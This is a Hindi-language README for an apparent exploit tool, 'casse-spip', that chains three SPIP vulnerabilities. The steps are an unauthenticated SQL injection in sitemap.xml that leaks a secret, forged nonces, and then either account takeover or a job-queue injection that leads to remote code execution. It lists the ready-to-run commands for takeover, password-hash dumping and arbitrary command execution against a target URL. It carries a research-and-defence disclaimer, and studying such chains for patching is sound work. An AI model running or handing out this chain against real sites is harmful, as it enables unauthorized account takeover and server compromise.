
SPIP CVE 2026-72708/72709/72710 के लिए Python exploit chain, जो unauthenticated SQL injection को account takeover और remote code execution से जोड़ता है।
Franck Chevalier (Wayko) द्वारा खोजे गए CVE-2026-72708, CVE-2026-72709 और CVE-2026-72710 के लिए एक्सप्लॉइट
पूरी तकनीकी गहराई में जाने के लिए, Lexfo के ब्लॉग पर पूरा लेख पढ़ें।
यह रिपॉज़िटरी केवल शोध और रक्षात्मक सुरक्षा उद्देश्यों के लिए प्रदान की गई है। लेखक इस जानकारी के दुरुपयोग की कोई ज़िम्मेदारी नहीं लेता।
प्रवेश बिंदु सार्वजनिक sitemap.xml पृष्ठ में एक SQL इंजेक्शन है जो alea_ephemere को लीक करता है।
उस सीक्रेट के साथ, अनाम क्रियाओं के लिए वैध nonces बनाए जा सकते हैं।
वहाँ से दो क्रियाएँ RCE तक ले जाती हैं:
action=editer_auteur अकाउंट टेकओवर, फिर प्राइवेट एरिया से RCE।action=editer_objet मास असाइनमेंट, spip_jobs कतार में एक पंक्ति लिखने के लिए, फिर action=cron के माध्यम से उसे निष्पादित करना।python3 -m venv .venv
.venv/bin/pip install -r requirements.txt
.venv/bin/python3 casse-spip.py --help
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --ato -i 1 -p "Casse-Spip!2026"
ओवरराइट करने से पहले, --ato लक्ष्य के login और वर्तमान pass हैश को डंप करता है
(SQLi के माध्यम से) ताकि आप बाद में --restore-hash के साथ उसे वापस रख सकें:
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --restore-hash '$2y$12$...' -i 1
.venv/bin/python3 casse-spip.py -t http://127.0.0.1:8000 --exploit -c "id"
फ़ाइल IMG/casse-spip_<token>.html में लिखी जाएगी।